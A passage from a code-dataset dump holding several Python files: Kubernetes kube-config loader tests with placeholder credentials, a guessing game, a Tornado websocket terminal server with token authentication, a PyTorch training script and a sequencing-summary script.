\"test-data\"\nTEST_DATA_BASE64 = _base64(TEST_DATA)\n\nTEST_ANOTHER_DATA = \"another-test-data\"\nTEST_ANOTHER_DATA_BASE64 = _base64(TEST_ANOTHER_DATA)\n\nTEST_HOST = \"test-host\"\nTEST_USERNAME = \"me\"\nTEST_PASSWORD = \"pass\"\n# token for me:pass\nTEST_BASIC_TOKEN = \"Basic bWU6cGFzcw==\"\n\nTEST_SSL_HOST = \"https://test-host\"\nTEST_CERTIFICATE_AUTH = \"cert-auth\"\nTEST_CERTIFICATE_AUTH_BASE64 = _base64(TEST_CERTIFICATE_AUTH)\nTEST_CLIENT_KEY = \"client-key\"\nTEST_CLIENT_KEY_BASE64 = _base64(TEST_CLIENT_KEY)\nTEST_CLIENT_CERT = \"client-cert\"\nTEST_CLIENT_CERT_BASE64 = _base64(TEST_CLIENT_CERT)\n\n\nclass BaseTestCase(unittest.TestCase):\n\n def setUp(self):\n self._temp_files = []\n\n def tearDown(self):\n for f in self._temp_files:\n os.remove(f)\n\n def _create_temp_file(self, content=\"\"):\n handler, name = tempfile.mkstemp()\n self._temp_files.append(name)\n os.write(handler, str.encode(content))\n os.close(handler)\n return name\n\n\nclass TestFileOrData(BaseTestCase):\n\n @staticmethod\n def get_file_content(filename):\n with open(filename) as f:\n return f.read()\n\n def test_file_given_file(self):\n obj = {TEST_FILE_KEY: TEST_FILENAME}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY)\n self.assertEqual(TEST_FILENAME, t.as_file())\n\n def test_file_given_data(self):\n obj = {TEST_DATA_KEY: TEST_DATA_BASE64}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA, self.get_file_content(t.as_file()))\n\n def test_data_given_data(self):\n obj = {TEST_DATA_KEY: TEST_DATA_BASE64}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA_BASE64, t.as_data())\n\n def test_data_given_file(self):\n obj = {\n TEST_FILE_KEY: self._create_temp_file(content=TEST_DATA)}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY)\n self.assertEqual(TEST_DATA_BASE64, t.as_data())\n\n def test_data_given_file_and_data(self):\n obj = {\n TEST_DATA_KEY: TEST_DATA_BASE64,\n TEST_FILE_KEY: self._create_temp_file(\n content=TEST_ANOTHER_DATA)}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n 
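# Both the data key and the file key are present here; as_data() should\n # prefer the inline data over the file contents (TEST_ANOTHER_DATA).\n 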
self.assertEqual(TEST_DATA_BASE64, t.as_data())\n\n def test_file_given_file_and_data(self):\n obj = {\n TEST_DATA_KEY: TEST_DATA_BASE64,\n TEST_FILE_KEY: self._create_temp_file(\n content=TEST_ANOTHER_DATA)}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA, self.get_file_content(t.as_file()))\n\n def test_create_temp_file_with_content(self):\n self.assertEqual(TEST_DATA,\n self.get_file_content(\n _create_temp_file_with_content(TEST_DATA)))\n\n\nclass TestConfigNode(BaseTestCase):\n\n test_obj = {\"key1\": \"test\", \"key2\": [\"a\", \"b\", \"c\"],\n \"key3\": {\"inner_key\": \"inner_value\"},\n \"with_names\": [{\"name\": \"test_name\", \"value\": \"test_value\"},\n {\"name\": \"test_name2\",\n \"value\": {\"key1\", \"test\"}},\n {\"name\": \"test_name3\", \"value\": [1, 2, 3]}]}\n\n def setUp(self):\n super(TestConfigNode, self).setUp()\n self.node = ConfigNode(\"test_obj\", self.test_obj)\n\n def test_normal_map_array_operations(self):\n self.assertEqual(\"test\", self.node['key1'])\n self.assertEqual(4, len(self.node))\n\n self.assertEqual(\"test_obj/key2\", self.node['key2'].name)\n self.assertEqual([\"a\", \"b\", \"c\"], self.node['key2'].value)\n self.assertEqual(\"b\", self.node['key2'][1])\n self.assertEqual(3, len(self.node['key2']))\n\n self.assertEqual(\"test_obj/key3\", self.node['key3'].name)\n self.assertEqual({\"inner_key\": \"inner_value\"}, self.node['key3'].value)\n self.assertEqual(\"inner_value\", self.node['key3'][\"inner_key\"])\n self.assertEqual(1, len(self.node['key3']))\n\n def test_get_with_name(self):\n node = self.node[\"with_names\"]\n self.assertEqual(\n \"test_value\",\n node.get_with_name(\"test_name\")[\"value\"])\n self.assertTrue(\n isinstance(node.get_with_name(\"test_name2\"), ConfigNode))\n self.assertTrue(\n isinstance(node.get_with_name(\"test_name3\"), ConfigNode))\n self.assertEqual(\"test_obj/with_names[name=test_name2]\",\n node.get_with_name(\"test_name2\").name)\n self.assertEqual(\"test_obj/with_names[name=test_name3]\",\n node.get_with_name(\"test_name3\").name)\n\n def expect_exception(self, func, message_part):\n with self.assertRaises(ConfigException) as context:\n func()\n self.assertIn(message_part, str(context.exception))\n\n def test_key_does_not_exists(self):\n self.expect_exception(lambda: self.node['not-exists-key'],\n \"Expected key not-exists-key in test_obj\")\n self.expect_exception(lambda: self.node['key3']['not-exists-key'],\n \"Expected key not-exists-key in test_obj/key3\")\n\n def test_get_with_name_on_invalid_object(self):\n self.expect_exception(\n lambda: self.node['key2'].get_with_name('no-name'),\n \"Expected all values in test_obj/key2 list to have \\'name\\' key\")\n\n def test_get_with_name_on_non_list_object(self):\n self.expect_exception(\n lambda: self.node['key3'].get_with_name('no-name'),\n \"Expected test_obj/key3 to be a list\")\n\n def test_get_with_name_on_name_does_not_exists(self):\n self.expect_exception(\n lambda: self.node['with_names'].get_with_name('no-name'),\n \"Expected object with name no-name in test_obj/with_names list\")\n\n\nclass FakeConfig:\n\n FILE_KEYS = [\"ssl_ca_cert\", \"key_file\", \"cert_file\"]\n\n def __init__(self, token=None, **kwargs):\n self.api_key = {}\n if token:\n self.api_key['authorization'] = token\n\n self.__dict__.update(kwargs)\n\n def __eq__(self, other):\n if len(self.__dict__) != len(other.__dict__):\n return\n for k, v in self.__dict__.items():\n if k not in other.__dict__:\n return\n if k in 
self.FILE_KEYS:\n try:\n with open(v) as f1, open(other.__dict__[k]) as f2:\n if f1.read() != f2.read():\n return\n except IOError:\n # fall back to only compare filenames in case we are\n # testing the passing of filenames to the config\n if other.__dict__[k] != v:\n return\n else:\n if other.__dict__[k] != v:\n return\n return True\n\n def __repr__(self):\n rep = \"\\n\"\n for k, v in self.__dict__.items():\n val = v\n if k in self.FILE_KEYS:\n try:\n with open(v) as f:\n val = \"FILE: %s\" % str.decode(f.read())\n except IOError as e:\n val = \"ERROR: %s\" % str(e)\n rep += \"\\t%s: %s\\n\" % (k, val)\n return \"Config(%s\\n)\" % rep\n\n\nclass TestKubeConfigLoader(BaseTestCase):\n TEST_KUBE_CONFIG = {\n \"current-context\": \"no_user\",\n \"contexts\": [\n {\n \"name\": \"no_user\",\n \"context\": {\n \"cluster\": \"default\"\n }\n },\n {\n \"name\": \"simple_token\",\n \"context\": {\n \"cluster\": \"default\",\n \"user\": \"simple_token\"\n }\n },\n {\n \"name\": \"gcp\",\n \"context\": {\n \"cluster\": \"default\",\n \"user\": \"gcp\"\n }\n },\n {\n \"name\": \"user_pass\",\n \"context\": {\n \"cluster\": \"default\",\n \"user\": \"user_pass\"\n }\n },\n {\n \"name\": \"ssl\",\n \"context\": {\n \"cluster\": \"ssl\",\n \"user\": \"ssl\"\n }\n },\n {\n \"name\": \"ssl-no_file\",\n \"context\": {\n \"cluster\": \"ssl-no_file\",\n \"user\": \"ssl-no_file\"\n }\n },\n ],\n \"clusters\": [\n {\n \"name\": \"default\",\n \"cluster\": {\n \"server\": TEST_HOST\n }\n },\n {\n \"name\": \"ssl-no_file\",\n \"cluster\": {\n \"server\": TEST_SSL_HOST,\n \"certificate-authority\": TEST_CERTIFICATE_AUTH,\n }\n },\n {\n \"name\": \"ssl\",\n \"cluster\": {\n \"server\": TEST_SSL_HOST,\n \"certificate-authority-data\": TEST_CERTIFICATE_AUTH_BASE64,\n }\n },\n ],\n \"users\": [\n {\n \"name\": \"simple_token\",\n \"user\": {\n \"token\": TEST_DATA_BASE64,\n \"username\": TEST_USERNAME, # should be ignored\n \"password\": TEST_PASSWORD, # should be ignored\n }\n },\n {\n \"name\": \"gcp\",\n \"user\": {\n \"auth-provider\": {\n \"name\": \"gcp\",\n \"access_token\": \"not_used\",\n },\n \"token\": TEST_DATA_BASE64, # should be ignored\n \"username\": TEST_USERNAME, # should be ignored\n \"password\": TEST_PASSWORD, # should be ignored\n }\n },\n {\n \"name\": \"user_pass\",\n \"user\": {\n \"username\": TEST_USERNAME, # should be ignored\n \"password\": TEST_PASSWORD, # should be ignored\n }\n },\n {\n \"name\": \"ssl-no_file\",\n \"user\": {\n \"token\": TEST_DATA_BASE64,\n \"client-certificate\": TEST_CLIENT_CERT,\n \"client-key\": TEST_CLIENT_KEY,\n }\n },\n {\n \"name\": \"ssl\",\n \"user\": {\n \"token\": TEST_DATA_BASE64,\n \"client-certificate-data\": TEST_CLIENT_CERT_BASE64,\n \"client-key-data\": TEST_CLIENT_KEY_BASE64,\n }\n },\n ]\n }\n\n def test_no_user_context(self):\n expected = FakeConfig(host=TEST_HOST)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"no_user\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_simple_token(self):\n expected = FakeConfig(host=TEST_HOST, token=TEST_DATA_BASE64)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"simple_token\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_load_user_token(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"simple_token\")\n self.assertTrue(loader._load_user_token())\n 
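# _load_user_token() returns True on success and stores the token on the\n # loader itself, which the next assertion verifies.\n 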
self.assertEqual(TEST_DATA_BASE64, loader.token)\n\n def test_gcp(self):\n expected = FakeConfig(host=TEST_HOST, token=TEST_ANOTHER_DATA_BASE64)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"gcp\",\n client_configuration=actual,\n get_google_credentials=lambda: TEST_ANOTHER_DATA_BASE64) \\\n .load_and_set()\n self.assertEqual(expected, actual)\n\n def test_load_gcp_token(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"gcp\",\n get_google_credentials=lambda: TEST_ANOTHER_DATA_BASE64)\n self.assertTrue(loader._load_gcp_token())\n self.assertEqual(TEST_ANOTHER_DATA_BASE64, loader.token)\n\n def test_user_pass(self):\n expected = FakeConfig(host=TEST_HOST, token=TEST_BASIC_TOKEN)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"user_pass\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_load_user_pass_token(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"user_pass\")\n self.assertTrue(loader._load_user_pass_token())\n self.assertEqual(TEST_BASIC_TOKEN, loader.token)\n\n def test_ssl_no_cert_files(self):\n expected = FakeConfig(\n host=TEST_SSL_HOST,\n token=TEST_DATA_BASE64,\n cert_file=TEST_CLIENT_CERT,\n key_file=TEST_CLIENT_KEY,\n ssl_ca_cert=TEST_CERTIFICATE_AUTH\n )\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"ssl-no_file\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_ssl(self):\n expected = FakeConfig(\n host=TEST_SSL_HOST,\n token=TEST_DATA_BASE64,\n cert_file=self._create_temp_file(TEST_CLIENT_CERT),\n key_file=self._create_temp_file(TEST_CLIENT_KEY),\n ssl_ca_cert=self._create_temp_file(TEST_CERTIFICATE_AUTH)\n )\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"ssl\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_list_contexts(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"no_user\")\n actual_contexts = loader.list_contexts()\n expected_contexts = ConfigNode(\"\", self.TEST_KUBE_CONFIG)['contexts']\n for actual in actual_contexts:\n expected = expected_contexts.get_with_name(actual['name'])\n self.assertEqual(expected.value, actual)\n\n def test_current_context(self):\n loader = KubeConfigLoader(config_dict=self.TEST_KUBE_CONFIG)\n expected_contexts = ConfigNode(\"\", self.TEST_KUBE_CONFIG)['contexts']\n self.assertEqual(expected_contexts.get_with_name(\"no_user\").value,\n loader.current_context)\n\n def test_set_active_context(self):\n loader = KubeConfigLoader(config_dict=self.TEST_KUBE_CONFIG)\n loader.set_active_context(\"ssl\")\n expected_contexts = ConfigNode(\"\", self.TEST_KUBE_CONFIG)['contexts']\n self.assertEqual(expected_contexts.get_with_name(\"ssl\").value,\n loader.current_context)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kubernetes/config/kube_config_test.py","file_name":"kube_config_test.py","file_ext":"py","file_size_in_byte":16570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182692946","text":"import random\n\nAnswer = random.randint(1, 20)\nnum_tries = 4\n\nguess = -1\ntries = 0\n\nwhile guess != Answer and tries < num_tries:\n guess = int(input(f\"You have {num_tries - tries} tries left. Guess a number between 1 and 20: \"))\n tries += 1\n\n if Answer > guess:\n print(\"Up\")\n elif Answer < guess:\n print(\"Down\")\n\nif guess == Answer:\n print(f\"Congratulations! You guessed the number in {tries} tries.\")\nelse:\n print(f\"Too bad! The answer was {Answer}.\")\n\n\n","sub_path":"codeit/python/quiz/num_game_sim/codeit_num_game.py","file_name":"codeit_num_game.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173412852","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nimport sys\nimport time\nimport uuid\n\nimport tornado.web\nimport tornado.websocket\n\nfrom . import proto, shell, utils, workspace\n\n\n@utils.Singleton\nclass ShellSessionManager(object):\n def __init__(self):\n self._sessions = {}\n asyncio.ensure_future(self.check_session_task())\n\n async def check_session_task(self):\n while True:\n for session in self._sessions:\n timeout, shell, timestamp = self._sessions[session]\n if timestamp and time.time() >= timestamp + timeout:\n # Clean session\n shell.exit()\n self._sessions.pop(session)\n break\n await asyncio.sleep(1)\n\n def create_session(self, shell, timeout):\n session_id = str(uuid.uuid4())\n self._sessions[session_id] = [timeout, shell, 0]\n return session_id\n\n def get_session(self, session_id):\n session = self._sessions.get(session_id)\n if session:\n return session[1]\n return None\n\n def update_session_time(self, session_id, timestamp):\n session = self._sessions.get(session_id)\n assert session is not None\n session[2] = timestamp\n\n\nclass WebSocketProtocol(tornado.websocket.WebSocketProtocol13):\n async def accept_connection(self, handler):\n if self.handler.check_permission():\n await super(WebSocketProtocol, self).accept_connection(handler)\n else:\n handler.set_status(403)\n log_msg = \"Authorization Failed\"\n handler.finish(log_msg)\n\n\nclass WSTerminalServerHandler(tornado.websocket.WebSocketHandler):\n \"\"\"Websocket Terminal Server Handler\"\"\"\n\n token = None\n\n def __init__(self, *args, **kwargs):\n super(WSTerminalServerHandler, self).__init__(*args, **kwargs)\n self._buffer = b\"\"\n self._workspace = None\n self._shell = None\n self._session_id = None\n self._sequence = 0x10000\n\n def check_permission(self):\n if self.token:\n auth = self.request.headers.get(\"Authorization\", \"\")\n if auth.startswith(\"Token \"):\n return auth.split()[-1].strip() == self.token\n else:\n return False\n return True\n\n def get_websocket_protocol(self):\n \"\"\"Override to connect target server\"\"\"\n websocket_version = self.request.headers.get(\"Sec-WebSocket-Version\")\n if websocket_version in (\"7\", \"8\", \"13\"):\n params = tornado.websocket._WebSocketParams(\n ping_interval=self.ping_interval,\n ping_timeout=self.ping_timeout,\n max_message_size=self.max_message_size,\n compression_options=self.get_compression_options(),\n )\n return WebSocketProtocol(self, mask_outgoing=True, params=params)\n\n async def on_message(self, message):\n self._buffer += message\n packet, self._buffer = proto.TransportPacket.deserialize(self._buffer)\n if packet:\n try:\n await self.handle_request(packet.message)\n except Exception as ex:\n utils.logger.exception(\"Handle request %s failed\" % packet.message)\n await self.send_response(packet.message, -1, str(ex))\n\n async def send_request(self, command, **kwargs):\n self._sequence += 1\n data = {\n \"command\": command,\n \"type\": proto.EnumPacketType.REQUEST,\n \"id\": self._sequence,\n }\n data.update(kwargs)\n 
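# Outgoing requests carry a monotonically increasing id so that responses\n # can be matched back to them; the dict is framed as a TransportPacket below.\n 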
packet = proto.TransportPacket(data)\n return await self.write_message(packet.serialize(), True)\n\n async def send_response(self, request, code=0, message=None, **kwargs):\n data = {\n \"command\": request[\"command\"],\n \"type\": proto.EnumPacketType.RESPONSE,\n \"id\": request[\"id\"],\n \"code\": code,\n \"message\": message or \"\",\n }\n data.update(kwargs)\n packet = proto.TransportPacket(data)\n return await self.write_message(packet.serialize(), True)\n\n async def handle_request(self, request):\n utils.logger.debug(\n \"[%s][Request][%d][%s] %s\"\n % (\n self.__class__.__name__,\n request.get(\"id\", 0),\n request.get(\"command\"),\n str(request)[:200],\n )\n )\n if request[\"command\"] == proto.EnumCommand.SYNC_WORKSPACE:\n worksapce_id = request[\"workspace\"]\n workspace_path = os.path.join(\n os.environ.get(\"WSTERM_WORKSPACE\", os.environ.get(\"TEMP\", \"/tmp\")),\n worksapce_id,\n )\n self._workspace = workspace.Workspace(workspace_path)\n data = self._workspace.snapshot()\n await self.send_response(\n request, data=data,\n )\n elif self._workspace and request[\"command\"] == proto.EnumCommand.WRITE_FILE:\n utils.logger.info(\n \"[%s] Update file %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.write_file(\n request[\"path\"], request[\"data\"], request[\"overwrite\"]\n )\n elif self._workspace and request[\"command\"] == proto.EnumCommand.REMOVE_FILE:\n utils.logger.info(\n \"[%s] Remove file %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.remove_file(request[\"path\"])\n elif self._workspace and request[\"command\"] == proto.EnumCommand.CREATE_DIR:\n utils.logger.info(\n \"[%s] Create directory %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.create_directory(request[\"path\"])\n elif self._workspace and request[\"command\"] == proto.EnumCommand.REMOVE_DIR:\n utils.logger.info(\n \"[%s] Remove directory %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.remove_directory(request[\"path\"])\n elif self._workspace and request[\"command\"] == proto.EnumCommand.MOVE_ITEM:\n utils.logger.info(\n \"[%s] Move item %s to %s\"\n % (self.__class__.__name__, request[\"src_path\"], request[\"dst_path\"])\n )\n self._workspace.move_item(request[\"src_path\"], request[\"dst_path\"])\n elif request[\"command\"] == proto.EnumCommand.CREATE_SHELL:\n session_id = request.get(\"session\")\n session_timeout = request.get(\"timeout\")\n utils.logger.info(\n \"[%s] Create shell (%d, %d)\"\n % (self.__class__.__name__, *request[\"size\"])\n )\n\n ssm = ShellSessionManager()\n if self._shell:\n await self.send_response(request, code=-1, message=\"Shell is created\")\n else:\n if session_id:\n shell = ssm.get_session(session_id)\n if not shell:\n await self.send_response(\n request,\n code=-1,\n message=\"Shell session %s not found\" % session_id,\n )\n return\n utils.logger.info(\n \"[%s] Use Cached shell session %s\"\n % (self.__class__.__name__, session_id)\n )\n self._session_id = session_id\n self._shell = shell\n ssm.update_session_time(session_id, 0) # Avoid cleaned\n asyncio.ensure_future(self.forward_shell())\n await self.send_response(request, platform=sys.platform)\n else:\n shell_workspace = os.getcwd()\n if self._workspace:\n shell_workspace = self._workspace.path\n asyncio.ensure_future(\n self.spawn_shell(shell_workspace, request[\"size\"])\n )\n time0 = time.time()\n while time.time() - time0 < 5:\n if self._shell:\n break\n await asyncio.sleep(0.005)\n else:\n await 
self.send_response(\n request, code=-1, message=\"Spawn shell timeout\"\n )\n return\n if session_timeout:\n self._session_id = ssm.create_session(\n self._shell, session_timeout\n )\n await self.send_response(\n request, platform=sys.platform, session=self._session_id\n )\n else:\n await self.send_response(request, platform=sys.platform)\n elif request[\"command\"] == proto.EnumCommand.WRITE_STDIN:\n if not self._shell:\n await self.send_response(request, code=-1, message=\"Shell not create\")\n else:\n utils.logger.debug(\n \"[%s] Input %s\" % (self.__class__.__name__, request[\"buffer\"])\n )\n self._shell.write(request[\"buffer\"])\n elif request[\"command\"] == proto.EnumCommand.RESIZE_SHELL:\n if not self._shell:\n await self.send_response(request, code=-1, message=\"Shell not create\")\n else:\n utils.logger.info(\n \"[%s] Resize shell to %d,%d\"\n % (self.__class__.__name__, request[\"size\"][0], request[\"size\"][1])\n )\n self._shell.resize(request[\"size\"])\n await self.send_response(request)\n\n async def write_shell_stdout(self, buffer):\n utils.logger.debug(\"[%s] Output %s\" % (self.__class__.__name__, buffer))\n await self.send_request(proto.EnumCommand.WRITE_STDOUT, buffer=buffer)\n\n async def spawn_shell(self, workspace, size):\n utils.logger.info(\n \"[%s] Spawn new shell (%d, %d)\"\n % (self.__class__.__name__, size[0], size[1])\n )\n self._shell = await shell.Shell.create(workspace, size)\n await self.forward_shell()\n\n async def forward_shell(self):\n tasks = [None]\n if self._shell.stderr:\n tasks.append(None)\n while self._shell and self._shell.process.returncode is None:\n if tasks[0] is None:\n tasks[0] = utils.safe_ensure_future(self._shell.stdout.read(4096))\n if self._shell.stderr and tasks[1] is None:\n tasks[1] = utils.safe_ensure_future(self._shell.stderr.read(4096))\n\n done_tasks, _ = await asyncio.wait(\n tasks, return_when=asyncio.FIRST_COMPLETED\n )\n\n for task in done_tasks:\n index = tasks.index(task)\n assert index >= 0\n tasks[index] = None\n buffer = task.result()\n if not buffer:\n await asyncio.sleep(0.01)\n break\n\n if self._shell:\n await self.write_shell_stdout(buffer)\n utils.logger.warn(\"[%s] Shell process exit\" % self.__class__.__name__)\n if self._shell:\n await self.send_request(proto.EnumCommand.EXIT_SHELL)\n self._shell = None\n\n def on_connection_close(self):\n utils.logger.warn(\"[%s] Connection closed\" % self.__class__.__name__)\n if self._shell:\n if not self._session_id:\n # Do not keep session\n self._shell.exit()\n else:\n # Wait foe client reconnect\n ShellSessionManager().update_session_time(self._session_id, time.time())\n self._shell = None\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\n \"
Hello WSTerm
    \"\n )\n\n\ndef start_server(listen_address, path, token=None):\n utils.logger.info(\"Websocket server listening at %s:%d\" % listen_address)\n WSTerminalServerHandler.token = token\n handlers = [(path, WSTerminalServerHandler), (\"/\", MainHandler)]\n app = tornado.web.Application(handlers, websocket_ping_interval=30)\n app.listen(listen_address[1], listen_address[0])\n","sub_path":"wsterm/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299988595","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom logger import Logger\nfrom MLP import Fusion as MLP_Dense\nfrom dataloader import local_dataloader\nimport numpy as np\n\nimport os\nfrom convert_back import convert_back\n\nlogger = Logger('./logs/Dense_Resnet')\n\nnusc_classes = ['__background__',\n 'pedestrian', 'barrier', 'trafficcone', 'bicycle', 'bus', 'car', 'construction', 'motorcycle',\n 'trailer', 'truck']\n\nbatch_size = 32\nnusc_set = local_dataloader(batch_size, len(nusc_classes), training=True)\nnusc_dataloader = torch.utils.data.DataLoader(nusc_set, batch_size=batch_size, shuffle=True)\nnusc_iters_per_epoch = int(len(nusc_set) / batch_size)\n\nnum_epochs = 200\n\n# model = MLP_Dense(k = 1, feature_transform = False)\nmodel = MLP_Dense()\nmodel.cuda()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999))\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.5)\n\nregressor = nn.SmoothL1Loss(reduction='none')\n\nimg = torch.FloatTensor(1).cuda()\ndep = torch.FloatTensor(1).cuda()\noriginalGT = torch.FloatTensor(1).cuda()\nshiftedGT = torch.FloatTensor(1).cuda()\noffSet = torch.FloatTensor(1).cuda()\ncameraMatrix = torch.FloatTensor(1).cuda()\ncameraFrameBox = torch.FloatTensor(1).cuda()\n\n\nimg = Variable(img)\ndep = Variable(dep)\noriginalGT = Variable(originalGT)\nshiftedGT = Variable(shiftedGT)\noffSet = Variable(offSet)\ncameraMatrix = Variable(cameraMatrix)\ncameraFrameBox = Variable(cameraFrameBox)\n\ndate = '2020_01_09__2'\n\nout_dir = os.path.dirname(os.path.abspath(__file__))\noutput_dir = out_dir + '/trained_model/' + date\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\nfor epoch in range(1, num_epochs + 1):\n scheduler.step()\n nusc_iter = iter(nusc_dataloader)\n loss_temp = 0\n loss_epoch = 0\n for step in range(nusc_iters_per_epoch):\n data = next(nusc_iter)\n with torch.no_grad():\n img.resize_(data[0].size()).copy_(data[0])\n dep.resize_(data[1].size()).copy_(data[1])\n originalGT.resize_(data[2].size()).copy_(data[2])\n shiftedGT.resize_(data[3].size()).copy_(data[3])\n offSet.resize_(data[4].size()).copy_(data[4])\n cameraMatrix.resize_(data[5].size()).copy_(data[5])\n cameraFrameBox.resize_(data[6].size()).copy_(data[6])\n\n optimizer.zero_grad()\n model = model.train()\n pred_offset, scores = model(img, dep, offSet, cameraMatrix)\n\n loss = 0\n\n # Unsupervised loss\n # loss = regressor(pred_offset, shiftedGT).mean(dim=(1, 2)).view(batch_size, -1) * scores - 0.1 * torch.log(scores)\n # loss = regressor(pred_offset, shiftedGT).mean(dim=(1, 2)).view(batch_size, -1)\n loss = regressor(convert_back(pred_offset, offSet, cameraMatrix), cameraFrameBox).mean(dim=(1, 2)).view(batch_size, -1) \\\n + regressor(pred_offset, shiftedGT).mean(dim=(1, 2)).view(batch_size, -1)\n\n loss = loss.sum(dim=0) / batch_size\n loss_temp += loss.item()\n loss_epoch += loss.item()\n\n loss.backward()\n 
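# zero_grad() ran at the top of this iteration; backward() above populated\n # the gradients that optimizer.step() below consumes for the update.\n 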
optimizer.step()\n\n # Finding anchor point and predicted offset based on maximum score\n max_inds = scores.max(dim=1)[1].cpu().numpy()\n p_offset = np.zeros((4, 8, 3))\n anchor_points = np.zeros((4, 3))\n truth_boxes = np.zeros((4, 8, 3))\n #for i in range(0, 4):\n # p_offset[i] = pred_offset[i][max_inds[i]].cpu().detach().numpy()\n # truth_boxes[i] = shiftedGT[i].cpu().numpy()\n\n # visualize_result(p_offset, anchor_points, truth_boxes)\n if step % 10 == 0 and step != 0:\n loss_temp /= 10\n print(\"Epoch [{}/{}], Step [{}/{}] Loss: {:.4f}\"\n .format(epoch, num_epochs + 1, step, nusc_iters_per_epoch, loss_temp))\n loss_temp = 0\n loss_epoch /= nusc_iters_per_epoch\n logger.scalar_summary('loss', loss_epoch, epoch)\n\n print(\"Loss for Epoch {} is {}\".format(epoch, loss_epoch))\n torch.save(model.state_dict(), os.path.join(output_dir, 'Epoch:{}_loss:{}'.format(epoch, loss_epoch)))\n loss_epoch = 0\n","sub_path":"train_Fusion.py","file_name":"train_Fusion.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"5471693","text":"from taban import Fore, sleep\nimport random\n\nrenkler = [\n Fore.RED,\n Fore.GREEN,\n Fore.BLUE,\n Fore.MAGENTA,\n Fore.YELLOW,\n Fore.CYAN,\n Fore.WHITE,\n Fore.LIGHTBLACK_EX,\n Fore.LIGHTBLUE_EX,\n Fore.LIGHTGREEN_EX,\n Fore.LIGHTMAGENTA_EX,\n Fore.LIGHTRED_EX,\n Fore.LIGHTYELLOW_EX\n]\n\n\ndef kisir():\n for i in range(20):\n print(f'{random.choice(renkler)} Kısır Döngü')\n sleep(0.2)","sub_path":"Python/z_base/fonksiyonlar/dongu.py","file_name":"dongu.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113947252","text":"#!/home/ubuntu/Code/miniconda3/bin/python\nimport os\nimport numpy as np\n\nmax_num = 100000\nos.chdir(\"/shared/demux_summary\")\nsums = [ x for x in os.listdir() if \"summary.txt\" in x ]\n\nn_list = list()\ns_list = list()\nfor fp in sorted(sums) :\n sample = fp.split(\".\")[0]\n in_fh = open(fp,'r')\n name_list = list()\n num_list = list()\n for line in in_fh:\n fields = line.strip().split()\n name_list.append(fields[1])\n num_list.append(int(fields[0]))\n num_list = np.array(num_list)\n total = np.sum(num_list)\n order_idx = np.argsort(num_list)[::-1]\n name_ordered = np.array(name_list)[order_idx]\n num_ordered = num_list[order_idx]\n name_top = name_ordered[0:4]\n num_top = num_ordered[0:4]\n order_idx = np.argsort(name_top)\n name_top = list(name_top[order_idx])\n num_top = list(num_top[order_idx])\n n_list.append('\\t'.join([str(x) for x in [sample,total]+num_top[0:3]]))\n s_list.append('\\t'.join([str(x) for x in [sample,total]+name_top[0:3]]))\n\nfor x in n_list :\n print(x)\nfor x in s_list :\n print(x)\n\n","sub_path":"old_isac/nanopore/190206_demux_summarize.py","file_name":"190206_demux_summarize.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502950612","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport unittest\r\nfrom 